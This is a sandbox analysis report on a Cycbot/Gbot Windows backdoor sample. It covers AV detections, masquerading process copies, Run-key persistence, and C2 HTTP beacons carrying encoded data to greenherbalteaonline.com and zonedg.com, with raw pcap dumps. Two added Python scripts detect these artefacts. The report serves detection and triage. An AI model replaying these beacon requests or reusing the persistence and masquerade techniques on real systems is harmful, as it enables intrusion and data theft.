Analysis Date: 2014-12-15 20:49:23
MD5: 07f51ba6b9274a00995d8a784d64d86c
SHA1: 50066cb071ffa927930b88afcc510bf486384f00

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text   md5: 66b8ee3f43f2dae3fde3e5a6dcd704cc  sha1: 28ef847b50c2a0b8f12d9d5e11b3362c55cac5f5  size: 114176
Section .rdata  md5: 15fe796071e8a5b8377c8b342a0822a5  sha1: aaa7af6fb42e4961b0337c051f5f7758d0f1a909  size: 1024
Section .data   md5: e0c2dc25cda890dd408d2699ccb1d5dd  sha1: fcb4f36e49458cfab4375a1d2abba2541a16314a  size: 65536
Section .reloc  md5: c3516d00bba06bf9d0d28a419bebbf00  sha1: 9650bb88d37aa0876e84665d96086447ed633235  size: 1024
Timestamp: 2005-10-31 09:12:21 (PE header compile time; trivially forged by a packer, so not usable to date the sample)
PEhash: 78448b347325bcad4e90c2a5c0aae620342e62ed
IMPhash: 06ee11c3ef9119f5a69e18e75a9dfb3a
AV 360 Safe: Gen:Variant.Kazy.38139
AV Ad-Aware: Gen:Variant.Kazy.38139
AV Alwil (avast): Cybota [Trj]
AV Arcabit (arcavir): Gen:Variant.Kazy.38139
AV Authentium: W32/Goolbot.K.gen!Eldorado
AV Avira (antivir): TR/Crypt.ZPACK.Gen
AV BullGuard: Gen:Variant.Kazy.38139
AV CA (E-Trust Ino): Win32/Cycbot.G!generic
AV CAT (quickheal): Backdoor.Cycbot.B
AV ClamAV: Win.Trojan.Agent-157058
AV Dr. Web: BackDoor.Gbot.69
AV Emsisoft: Gen:Variant.Kazy.38139
AV Eset (nod32): Win32/Kryptik.TBB
AV Fortinet: W32/Jorik_Gbot.EBE!tr
AV Frisk (f-prot): W32/Goolbot.K.gen!Eldorado
AV F-Secure: Gen:Variant.Kazy.38139
AV Grisoft (avg): Win32/Cryptor
AV Ikarus: Virus.Win32.Cryptor
AV K7: Backdoor ( 003210941 )
AV Kaspersky: Trojan.Win32.Generic
AV MalwareBytes: Backdoor.Bot
AV Mcafee: BackDoor-EXI.gen.r
AV Microsoft Security Essentials: Backdoor:Win32/Cycbot.G
AV MicroWorld (escan): Gen:Variant.Kazy.38139
AV Rising: no_virus
AV Sophos: Mal/FakeAV-IS
AV Symantec: Backdoor.Cycbot!gen7
AV Trend Micro: BKDR_CYCBOT.SME3
AV VirusBlokAda (vba32): Backdoor.Gbot

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ 1
Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\conhost ➝ C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates Mutex: {A5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: {61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex: {0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: {B5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates Mutex: {B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
Creates Mutex: {B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex: {6988405C-71C3-427c-975A-0398706E79EE}
Winsock DNS: worldmotoblo.com
Winsock DNS: greenherbalteaonline.com
Winsock DNS: 127.0.0.1
Winsock DNS: fastblogportal.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates Process: C:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
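The process tree above launches copies of the sample under the names csrss.exe, dwm.exe and conhost.exe from the user's profile and registers conhost under the HKLM Run key. The script below is an added example, not part of the sandbox output: it applies the checks a triage analyst would run over such events (a Windows system-process name started from anywhere but System32/SysWOW64, a Run value pointing into a user-writable directory, ProxyEnable flipped on). The event list is copied from the Runtime Details above; the control entry C:\WINDOWS\system32\csrss.exe is an assumed benign path added to show the check does not fire on the real binary.

```python
"""Triage of the host artefacts a sandbox report lists (added example)."""
import re
from typing import Optional

# Names a legitimate Windows install only ever runs from System32/SysWOW64.
SYSTEM_ONLY_BINARIES = {
    "csrss.exe", "dwm.exe", "conhost.exe", "smss.exe", "wininit.exe",
    "winlogon.exe", "lsass.exe", "services.exe", "svchost.exe",
}
SYSTEM_DIRS = re.compile(r"^[a-z]:\\windows\\(system32|syswow64)\\", re.IGNORECASE)
# Profile and temp directories a standard user can write to (XP and Vista+ layouts).
USER_WRITABLE = re.compile(
    r"^[a-z]:\\(documents and settings|users)\\[^\\]+\\|^[a-z]:\\windows\\temp\\",
    re.IGNORECASE,
)


def file_name(path: str) -> str:
    """Last path component, lower-cased (either separator accepted)."""
    return re.split(r"[\\/]", path.strip())[-1].lower()


def masquerade_finding(path: str) -> Optional[str]:
    """A system-process name outside System32/SysWOW64 is a masquerade."""
    name = file_name(path)
    if name in SYSTEM_ONLY_BINARIES and not SYSTEM_DIRS.match(path.strip()):
        return f"system binary name {name} launched from {path.strip()}"
    return None


def run_key_finding(value_name: str, data: str) -> Optional[str]:
    """Flag Run-key persistence that masquerades or lives in a user-writable directory."""
    target = data.strip().strip('"')
    masquerade = masquerade_finding(target)
    if masquerade:
        return f"Run value {value_name!r}: {masquerade}"
    if USER_WRITABLE.match(target):
        return f"Run value {value_name!r} points into a user-writable directory: {target}"
    return None


def triage(events) -> list:
    """Apply the checks to (kind, payload) records:
    ('process', path) or ('registry', (key_path, data))."""
    findings = []
    for kind, payload in events:
        finding = None
        if kind == "process":
            finding = masquerade_finding(payload)
        elif kind == "registry":
            key, data = payload
            parent, _, value_name = key.rpartition("\\")
            if parent.lower().endswith("\\currentversion\\run"):
                finding = run_key_finding(value_name, data)
            elif key.lower().endswith("\\internet settings\\proxyenable") and data.strip() == "1":
                finding = ("ProxyEnable=1 under Internet Settings: browser traffic will be "
                           "sent through whatever ProxyServer value is configured")
        if finding:
            findings.append(finding)
    return findings


# Constructed from the Runtime Details above; the System32 csrss.exe is an
# assumed benign control that must not fire.
SAMPLE_EVENTS = [
    ("process", r"C:\malware.exe"),
    ("process", r"C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe"),
    ("process", r"C:\Documents and Settings\Administrator\Application Data\dwm.exe"),
    ("process", r"C:\WINDOWS\system32\csrss.exe"),
    ("registry", (r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\conhost",
                  r"C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe")),
    ("registry", (r"HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable",
                  "1")),
]

if __name__ == "__main__":
    for line in triage(SAMPLE_EVENTS):
        print(line)
```

On a real host the same checks run over Sysmon event ID 1 (process create) and ID 13 (registry value set); the path test is the one that matters, because the file names are chosen precisely so that a process list looks normal.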

Network Details:

DNS: greenherbalteaonline.com  Type: A  ➝ 141.8.225.80
DNS: zonedg.com  Type: A  ➝ 141.8.225.80
DNS: zonedg.com  Type: A  ➝ 141.8.225.80
DNS: freshmediaportal.com  Type: A  (no answer recorded)
DNS: fastblogportal.com  Type: A  (no answer recorded)
DNS: worldmotoblo.com  Type: A  (no answer recorded)
HTTP GET: http://greenherbalteaonline.com/images/greenherbalteagirlholdingcup350.gif?v42=70&tq=gJ4WK%2FSUh7zEhRMw9YLJsMSTUivqg4a8xZNTK%2B%2FbxWq1SfkIYUhF
  User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsS%2FT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqpSr%2Fe%2BV5ZuRg%3D%3D
  User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsS%2FT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8yjYvEaS%2FT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D
  User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsS%2FT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8yjYvEaSPT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D
  User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsS%2FT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqlSr%2Fe%2BV5ZuRg%3D%3D
  User-Agent: mozilla/2.0
Flows TCP: 192.168.1.1:1031 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1034 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1035 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1036 ➝ 141.8.225.80:80
(All five flows go to 141.8.225.80:80, the address both resolved domains share; the GET is to greenherbalteaonline.com, the four POSTs to zonedg.com. The four POST query strings differ only in a few characters of the tq blob.)

Raw Pcap
0x00000000 (00000)   47455420 2f696d61 6765732f 67726565   GET /images/gree
0x00000010 (00016)   6e686572 62616c74 65616769 726c686f   nherbalteagirlho
0x00000020 (00032)   6c64696e 67637570 3335302e 6769663f   ldingcup350.gif?
0x00000030 (00048)   7634323d 37302674 713d674a 34574b25   v42=70&tq=gJ4WK%
0x00000040 (00064)   32465355 68377a45 68524d77 39594c4a   2FSUh7zEhRMw9YLJ
0x00000050 (00080)   734d5354 55697671 67346138 785a4e54   sMSTUivqg4a8xZNT
0x00000060 (00096)   4b253242 25324662 78577131 53666b49   K%2B%2FbxWq1SfkI
0x00000070 (00112)   59556846 20485454 502f312e 300d0a43   YUhF HTTP/1.0..C
0x00000080 (00128)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000090 (00144)   0d0a486f 73743a20 67726565 6e686572   ..Host: greenher
0x000000a0 (00160)   62616c74 65616f6e 6c696e65 2e636f6d   balteaonline.com
0x000000b0 (00176)   0d0a4163 63657074 3a202a2f 2a0d0a55   ..Accept: */*..U
0x000000c0 (00192)   7365722d 4167656e 743a206d 6f7a696c   ser-Agent: mozil
0x000000d0 (00208)   6c612f32 2e300d0a 0d0a                la/2.0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735325 32465435 77756725 32427479   VsS%2FT5wug%2Bty
0x00000040 (00064)   6766764f 37483333 4868626a 25324668   gfvO7H33Hhbj%2Fh
0x00000050 (00080)   37736265 64663173 53765438 74363569   7sbedf1sSvT8t65i
0x00000060 (00096)   39686c4c 39506d78 71584830 62462532   9hlL9PmxqXH0bF%2
0x00000070 (00112)   466d694d 57726450 6435534f 65696b4c   FmiMWrdPd5SOeikL
0x00000080 (00128)   35306742 394b3550 4c4e7133 6546476a   50gB9K5PLNq3eFGj
0x00000090 (00144)   7a682532 46384464 41596472 5435574f   zh%2F8DdAYdrT5WO
0x000000a0 (00160)   30616c78 74796762 70623648 766e5341   0alxtygbpb6HvnSA
0x000000b0 (00176)   4f51696a 25324238 4f6f5976 45615350   OQij%2B8OoYvEaSP
0x000000c0 (00192)   54253242 73717053 72253246 65253242   T%2BsqpSr%2Fe%2B
0x000000d0 (00208)   56355a75 52672533 44253344 20485454   V5ZuRg%3D%3D HTT
0x000000e0 (00224)   502f312e 310d0a48 6f73743a 207a6f6e   P/1.1..Host: zon
0x000000f0 (00240)   6564672e 636f6d0d 0a557365 722d4167   edg.com..User-Ag
0x00000100 (00256)   656e743a 206d6f7a 696c6c61 2f322e30   ent: mozilla/2.0
0x00000110 (00272)   0d0a436f 6e74656e 742d4c65 6e677468   ..Content-Length
0x00000120 (00288)   3a20300d 0a436f6e 6e656374 696f6e3a   : 0..Connection:
0x00000130 (00304)   20636c6f 73650d0a 0d0a                 close....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735325 32465435 77756725 32427479   VsS%2FT5wug%2Bty
0x00000040 (00064)   6766764f 37483333 4868626a 25324668   gfvO7H33Hhbj%2Fh
0x00000050 (00080)   37736265 64663173 53765438 74363569   7sbedf1sSvT8t65i
0x00000060 (00096)   39686c4c 39506d78 71584830 62462532   9hlL9PmxqXH0bF%2
0x00000070 (00112)   466d694d 57726450 6435534f 65696b4c   FmiMWrdPd5SOeikL
0x00000080 (00128)   35306742 394b3550 4c4e7133 6546476a   50gB9K5PLNq3eFGj
0x00000090 (00144)   7a682532 46384464 41596472 5435574f   zh%2F8DdAYdrT5WO
0x000000a0 (00160)   30616c78 74796762 70623648 766e5341   0alxtygbpb6HvnSA
0x000000b0 (00176)   4f51696a 25324238 796a5976 45615325   OQij%2B8yjYvEaS%
0x000000c0 (00192)   32465425 32427371 74537225 32466525   2FT%2BsqtSr%2Fe%
0x000000d0 (00208)   32425635 5a755267 25334425 33442048   2BV5ZuRg%3D%3D H
0x000000e0 (00224)   5454502f 312e310d 0a486f73 743a207a   TTP/1.1..Host: z
0x000000f0 (00240)   6f6e6564 672e636f 6d0d0a55 7365722d   onedg.com..User-
0x00000100 (00256)   4167656e 743a206d 6f7a696c 6c612f32   Agent: mozilla/2
0x00000110 (00272)   2e300d0a 436f6e74 656e742d 4c656e67   .0..Content-Leng
0x00000120 (00288)   74683a20 300d0a43 6f6e6e65 6374696f   th: 0..Connectio
0x00000130 (00304)   6e3a2063 6c6f7365 0d0a0d0a 68206669   n: close....h fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735325 32465435 77756725 32427479   VsS%2FT5wug%2Bty
0x00000040 (00064)   6766764f 37483333 4868626a 25324668   gfvO7H33Hhbj%2Fh
0x00000050 (00080)   37736265 64663173 53765438 74363569   7sbedf1sSvT8t65i
0x00000060 (00096)   39686c4c 39506d78 71584830 62462532   9hlL9PmxqXH0bF%2
0x00000070 (00112)   466d694d 57726450 6435534f 65696b4c   FmiMWrdPd5SOeikL
0x00000080 (00128)   35306742 394b3550 4c4e7133 6546476a   50gB9K5PLNq3eFGj
0x00000090 (00144)   7a682532 46384464 41596472 5435574f   zh%2F8DdAYdrT5WO
0x000000a0 (00160)   30616c78 74796762 70623648 766e5341   0alxtygbpb6HvnSA
0x000000b0 (00176)   4f51696a 25324238 796a5976 45615350   OQij%2B8yjYvEaSP
0x000000c0 (00192)   54253242 73717453 72253246 65253242   T%2BsqtSr%2Fe%2B
0x000000d0 (00208)   56355a75 52672533 44253344 20485454   V5ZuRg%3D%3D HTT
0x000000e0 (00224)   502f312e 310d0a48 6f73743a 207a6f6e   P/1.1..Host: zon
0x000000f0 (00240)   6564672e 636f6d0d 0a557365 722d4167   edg.com..User-Ag
0x00000100 (00256)   656e743a 206d6f7a 696c6c61 2f322e30   ent: mozilla/2.0
0x00000110 (00272)   0d0a436f 6e74656e 742d4c65 6e677468   ..Content-Length
0x00000120 (00288)   3a20300d 0a436f6e 6e656374 696f6e3a   : 0..Connection:
0x00000130 (00304)   20636c6f 73650d0a 0d0a                 close....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735325 32465435 77756725 32427479   VsS%2FT5wug%2Bty
0x00000040 (00064)   6766764f 37483333 4868626a 25324668   gfvO7H33Hhbj%2Fh
0x00000050 (00080)   37736265 64663173 53765438 74363569   7sbedf1sSvT8t65i
0x00000060 (00096)   39686c4c 39506d78 71584830 62462532   9hlL9PmxqXH0bF%2
0x00000070 (00112)   466d694d 57726450 6435534f 65696b4c   FmiMWrdPd5SOeikL
0x00000080 (00128)   35306742 394b3550 4c4e7133 6546476a   50gB9K5PLNq3eFGj
0x00000090 (00144)   7a682532 46384464 41596472 5435574f   zh%2F8DdAYdrT5WO
0x000000a0 (00160)   30616c78 74796762 70623648 766e5341   0alxtygbpb6HvnSA
0x000000b0 (00176)   4f51696a 25324238 4f6f5976 45615350   OQij%2B8OoYvEaSP
0x000000c0 (00192)   54253242 73716c53 72253246 65253242   T%2BsqlSr%2Fe%2B
0x000000d0 (00208)   56355a75 52672533 44253344 20485454   V5ZuRg%3D%3D HTT
0x000000e0 (00224)   502f312e 310d0a48 6f73743a 207a6f6e   P/1.1..Host: zon
0x000000f0 (00240)   6564672e 636f6d0d 0a557365 722d4167   edg.com..User-Ag
0x00000100 (00256)   656e743a 206d6f7a 696c6c61 2f322e30   ent: mozilla/2.0
0x00000110 (00272)   0d0a436f 6e74656e 742d4c65 6e677468   ..Content-Length
0x00000120 (00288)   3a20300d 0a436f6e 6e656374 696f6e3a   : 0..Connection:
0x00000130 (00304)   20636c6f 73650d0a 0d0a0d0a 68206669    close......h fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.
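The Raw Pcap blocks above can be turned back into bytes and scored for the traits every request in this report shares: the User-Agent string mozilla/2.0, a base64 blob in a tq= query parameter, POSTs with Content-Length: 0 that carry their data in the URL, and a GET for a .gif with a query string. The parser and scorer below are an added example, not sandbox code: the GET dump is copied from the first Raw Pcap block, the POST is rebuilt from the first zonedg.com request in Network Details, the benign request is made up for contrast, and the indicator names are mine.

```python
"""Rebuild HTTP requests from a sandbox hex dump and score beacon traits (added example)."""
import base64
import re
from urllib.parse import unquote, urlsplit

# One dump line: hex offset, decimal offset in parentheses, 1-4 groups of up to
# 4 bytes, then the ASCII column. The bounded repeat stops after four groups,
# so ASCII text that happens to look like hex is never consumed.
HEX_LINE = re.compile(r"^0x[0-9a-fA-F]+\s+\(\d+\)\s+((?:[0-9a-fA-F]{2,8}\s){1,4})")


def parse_hexdump(text: str) -> list:
    """One bytes object per blank-line-separated block. Only the hex groups are
    used, so bytes the dump prints as '.' come back intact."""
    blocks, current = [], bytearray()
    for line in text.splitlines():
        m = HEX_LINE.match(line)
        if m:
            current += bytes.fromhex("".join(m.group(1).split()))
        elif not line.strip() and current:
            blocks.append(bytes(current))
            current = bytearray()
    if current:
        blocks.append(bytes(current))
    return blocks


def parse_request(raw: bytes) -> dict:
    """Request line, lower-cased headers, and whatever follows the first blank
    line (the dump glues the server's error page onto some requests)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "version": version,
            "headers": headers, "body": body}


def query_params(target: str) -> dict:
    """unquote(), not parse_qs(): parse_qs turns a literal '+' into a space and
    would corrupt the base64 blob if the bot ever stopped escaping it."""
    params = {}
    for pair in urlsplit(target).query.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            params[unquote(key)] = unquote(value)
    return params


def tq_payload(req: dict):
    """Decoded bytes of the tq= parameter when it is well-formed base64, else None."""
    value = query_params(req["target"]).get("tq")
    if value is None or len(value) % 4 or not re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", value):
        return None
    try:
        return base64.b64decode(value, validate=True)
    except ValueError:
        return None


def beacon_indicators(req: dict) -> list:
    """Traits shared by every request in the report. None is conclusive on its
    own; three or more on one flow is worth an alert."""
    found = []
    if req["headers"].get("user-agent", "").lower() == "mozilla/2.0":
        found.append("ua-mozilla/2.0")            # no real browser sends this
    params = query_params(req["target"])
    if "tq" in params:
        found.append("tq-param")
        if tq_payload(req) is not None:
            found.append("tq-base64")
    path = urlsplit(req["target"]).path.lower()
    if req["method"] == "POST" and req["headers"].get("content-length") == "0" and params:
        found.append("empty-post-with-query")     # data rides in the URL, body is empty
    if req["method"] == "GET" and path.endswith((".gif", ".jpg", ".png")) and params:
        found.append("image-path-with-query")     # C2 dressed up as an image fetch
    return found


# Copied from the first Raw Pcap block (the GET to greenherbalteaonline.com).
SAMPLE_DUMP = """\
0x00000000 (00000)   47455420 2f696d61 6765732f 67726565   GET /images/gree
0x00000010 (00016)   6e686572 62616c74 65616769 726c686f   nherbalteagirlho
0x00000020 (00032)   6c64696e 67637570 3335302e 6769663f   ldingcup350.gif?
0x00000030 (00048)   7634323d 37302674 713d674a 34574b25   v42=70&tq=gJ4WK%
0x00000040 (00064)   32465355 68377a45 68524d77 39594c4a   2FSUh7zEhRMw9YLJ
0x00000050 (00080)   734d5354 55697671 67346138 785a4e54   sMSTUivqg4a8xZNT
0x00000060 (00096)   4b253242 25324662 78577131 53666b49   K%2B%2FbxWq1SfkI
0x00000070 (00112)   59556846 20485454 502f312e 300d0a43   YUhF HTTP/1.0..C
0x00000080 (00128)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000090 (00144)   0d0a486f 73743a20 67726565 6e686572   ..Host: greenher
0x000000a0 (00160)   62616c74 65616f6e 6c696e65 2e636f6d   balteaonline.com
0x000000b0 (00176)   0d0a4163 63657074 3a202a2f 2a0d0a55   ..Accept: */*..U
0x000000c0 (00192)   7365722d 4167656e 743a206d 6f7a696c   ser-Agent: mozil
0x000000d0 (00208)   6c612f32 2e300d0a 0d0a                la/2.0....
"""

# The first POST from Network Details, re-assembled as the bytes the dump shows.
SAMPLE_POST = (
    b"POST /index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsS%2FT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1s"
    b"SvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij"
    b"%2B8OoYvEaSPT%2BsqpSr%2Fe%2BV5ZuRg%3D%3D HTTP/1.1\r\nHost: zonedg.com\r\n"
    b"User-Agent: mozilla/2.0\r\nContent-Length: 0\r\nConnection: close\r\n\r\n"
)

if __name__ == "__main__":
    for raw in parse_hexdump(SAMPLE_DUMP) + [SAMPLE_POST]:
        req = parse_request(raw)
        print(req["method"], req["headers"].get("host"), beacon_indicators(req))
```

The same indicator logic ports directly to a proxy or IDS rule: match the exact lower-case User-Agent, then require a tq= parameter whose value is 4-aligned base64, and treat a zero-length POST with a query string as the third hit.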


Strings
]
...
....`%
.i...
L~\.
.
.
080904b0
1.0.0.1
1994
FileVersion
&find
&Find any        Alt+F
PrivateBuild
ProductVersion
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
``"`@<:
^^^^^^
~~~~~~^^^^^^^^^^
========
>>>>>>
>>>>>>>>>>>>>>>>
      
   ;(`
______
_______________
______________________
---------
,,,,,,,
;;;;;;;;;;;
;''''''
:::::::
:::::::::
:::::::::::
???????@@@
////```
//////////////(((((((((((((
""""""""
( `,`@
((((((
((((((((((((!!!!!!
))))))))
[[[[[[[[
]]]]]]
{{{{{{{{{{{{
}}};;;;
}}}}}}}}}}}}
$$$$$$
$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
*******
**************
\\\\\\\\\\\\\\\\
&}}}}}}}
########
#########
%%%%%%
%%%%%%%%%%
+++++++
+++++++++
								
000000000IIIIIIIIII;;;;;;;;;;;;;s
000000WW
000?????????????5
111111111
11111jjjjj^^^^^^^
******,,,,,,,,,111________ddddddpp#@@@@@@@
11wJ#kg
18ZDcK
``1eH0
` 	1}M
1m?Hzm
1x])TB
22222222
2[EV	S
2G^=E2
* @#2Iq[
-2l(@ 
2VZqP<
33333333
333333333
33ZZZjjjjj
{\34.`
3P)DJ%c>2?}
3z66X^
4444444444
(4444444444
:48EDVx
4EfuWbz
@ 4>jP?
4,/NQf
555555555555555555555555
555ZZZZZ
\5I8a'wQ
-5L(`@
5&@ M&
5`S|f,
65:m`5q
666cccXXXX
68np@;C
6F88bR
`@6\s0
6s8DCh*
6T61|k
\6]Xw1
@6\Yw@
77>>>>>>>
777777111111111111111ffff
7777777
77777777
77777777777JJJJJJJJJJCCCCC
,[7A8xb
8888888)))))))iiii
888888g
 8A. `uv;
8jYV]qL
8%rI3(
999999999
9999999999
999999999999
999999999999999
999999999999999999
99VVVVVV
{9<@l:Y
9`z#rs
a2;8G&
/A34Ej
`A6 Nbm@=_
%$[aa0
^^aaaaaa
aaaaaaaa
aaaaaaaaaaaaaaaa
$AAkkk
AF6%&B
af>lQwL
Ag&GXj_?
Ai>y=a&@@px.` w
A{K3AX
aLVuH]%
alXpB${
)Am:F"
#######b
))b;1<J
BB]]]]]]]]\\\
>bbbbbb
%%BBBBBBBb
BBBBBBBBB
>>>>>>~??????BBBBBBBBBBB
b.` `FH_r/TO
}BFKIQ`
-'/,BHy
bli-+"
bn	=S,A*
Br#igkw
BS5F-`
bzj3jp'
C ]1VMFX
 c80Ap
c#@8Aac
cBnBC%.{
@ cc#\
<<CCC2222222222cccccccccccc
||||||[[[[[[[[[[CCCCC
ccccccccccX
cccccfffffffffkkkk
CCCEEEEEEE
c(CH9v
/~cD@{
cN1)2S
CreateFileW
@.data
_d* @b
dCLH,` 
DD2222222
ddddddd
!]ddddddddd
dddddddddd
DDDDDDDDDDD))))+++
ddddddddddVVV
ddddffffffffff
DjS:* 
D*``NW
DuplicateHandle
Dx#JP2.`
e}5#n,
ECCgz<7
eDFgS~]c
`@e,  e"
?eH~8_
+eK?Q?
e.@`l[rf]f)
eruR)gL
EW@1%T/
ExitProcess
EyP<T7
F$@   `
fbQa[0q5
FeFZ[{	
FFFFFeEEEEEEEEEEEEEZZZZZZZZZZZZZZZZZZZaaaaaGGG|||||||
FFFFFFF
?ffffffffffffff
ffffmm
F(I=/`
f;i?bw
FlushInstructionCache
fqqqqqqqqqqqqqqqqqqqqq
FqQxQSY
fSSSSSSSSSSSSSWWWWW
fv=DhAk
#FwP&yYZI
@`_g!<
Ga<f3;
gb30%Z
#$` Gd
GetCurrentProcess
GetCurrentThreadId
GetLastError
GetTempPathW
GetThreadContext
GetVersionExW
gfffffffffQQ
gg9999
gggg,,,
GGGGGGG
GGGGGGGGG
GGGGGGGGGGGIIIIIIII
GGJJ))))^^
:'gIF@
G#ka(@
GlobalAlloc
GlobalFree
GlobalLock
